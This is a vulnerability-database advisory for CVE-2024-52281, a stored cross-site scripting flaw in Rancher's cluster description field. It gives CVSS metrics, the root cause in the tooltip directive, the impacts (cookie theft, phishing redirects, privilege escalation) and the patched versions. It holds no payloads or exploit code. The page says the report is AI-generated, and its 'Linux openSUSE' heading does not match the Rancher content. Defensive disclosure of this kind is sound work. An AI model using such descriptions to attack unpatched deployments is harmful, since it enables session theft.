Wiz
Vulnerability DatabaseCVE-2024-52281

CVE-2024-52281
Linux openSUSE vulnerability analysis and mitigation

Overview

A severe vulnerability (CVE-2024-52281) has been discovered in Rancher, an open-source container management platform widely used for Kubernetes deployments. The vulnerability, identified by Bhavin Makwana from Workday's Cyber Defence Team, is rated with a CVSS score of 8.9 and was identified as a Stored Cross-Site Scripting (XSS) flaw in the Rancher UI. The issue affects Rancher versions from 2.9.0 before 2.9.4 (GitHub Advisory, Security Online).

Technical details

The vulnerability stems from a Stored XSS issue in the Rancher UI, specifically in the cluster description field which fails to properly sanitize user-input HTML code. The technical root cause was identified in the v-tooltip directive, which was later replaced with a safer v-clean-tooltip directive to ensure proper HTML sanitization before rendering. The vulnerability received a CVSS v3.1 base score of 8.9, with the following metrics: Network attack vector, Low attack complexity, Low privileges required, User interaction Required, Changed scope, High impact on both Confidentiality and Integrity, and Low impact on Availability (GitHub Advisory, Wiz).

Impact

Attackers exploiting this vulnerability could compromise user sessions by stealing session cookies or sensitive user information, inject malicious scripts to redirect users to phishing sites or deliver malware, and potentially escalate privileges to perform actions on behalf of compromised users within Rancher-managed clusters (Security Online).

Mitigation and workarounds

Rancher has addressed this vulnerability by releasing patched versions 2.9.4 and 2.10.0. The fix includes enhanced HTML sanitization processes, specifically replacing the v-tooltip directive with the safer v-clean-tooltip directive. There are no workarounds available, and users are strongly urged to upgrade their Rancher deployments immediately to the patched versions (GitHub Advisory, Security Online).

Community reactions

The security community has actively discussed this vulnerability on social media platforms, with security researchers and organizations emphasizing the importance of immediate patching. Notable reactions include warnings about the potential impact on Kubernetes deployments and the urgency of applying security updates (SOCRadar).

Additional resources

SourceThis report was generated using AI

Related Linux openSUSE vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-62291HIGH8.1
  • strongSwanstrongSwan
  • strongswan-doc
NoYesJan 16, 2026
CVE-2026-0891HIGH8.1
  • Mozilla FirefoxMozilla Firefox
  • rhel10::firefox-flatpak
NoYesJan 13, 2026
CVE-2025-24528HIGH7.1
  • KerberosKerberos
  • crypto-policies
NoYesJan 16, 2026
CVE-2026-0890MEDIUM5.4
  • Mozilla FirefoxMozilla Firefox
  • cpe:2.3:a:mozilla:firefox_esr
NoYesJan 13, 2026
CVE-2025-43904MEDIUM4.2
  • Linux DebianLinux Debian
  • slurm_22_05-munge
NoYesJan 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Additional Wiz resources

Cloud Vulnerability DB

Cloud Vulnerability DB

A community-led vulnerabilities database

Cloud Threat Landscape

Cloud Threat Landscape

A threat intelligence database

PEACH

PEACH

A tenant isolation framework

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management
Get a demo